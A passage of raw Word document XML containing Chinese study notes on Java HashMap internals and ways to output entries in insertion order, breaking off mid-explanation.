          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对象时，会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>算法来决定其在数组中的存储位置，在根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法决定其在该数组位置上的链表中的存储位置；当需要取出一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>时，也会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>算法找到其在数组中的存储位置，再根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法从该位置上的链表中取出该</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E26D6" w:rsidRDefault="00DA54D7" w:rsidP="008467A1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00364532" w:rsidRPr="0054230D">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/ITtangtang/p/3948406.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00F41A4C" w:rsidRDefault="00252B51" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.3.</w:t>
      </w:r>
      <w:r w:rsidR="00364532" w:rsidRPr="00F41A4C">
        <w:t>4  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="00364532" w:rsidRPr="00F41A4C">
        <w:t>怎么实现的？按时间序列插入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00F41A4C" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>题目：使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">hashmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>插入数据，怎么样按照插入数据的顺序输出数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>插入数据，数据的顺序会改变。可以写个小程序试试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那怎么样按照插入的顺序输出呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法一：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这是我第一时间想出来的办法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>维护一张表，存储数据插入的顺序，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。但是如果删除数据呢，首先得在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面找到那个数据，再删除，而删除又要移动大量数据。性能效率很低。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，移动问题可以解决，但是查找数据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间消耗，如果删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>次，那查找数据的性能就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n*m)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，那总体性能也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。性能还是没法接受。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法二：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面维护插入顺序的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">id, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>建一个字段存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，再维护一张表</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>插入的时候，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＋＝</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashmap.insert</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
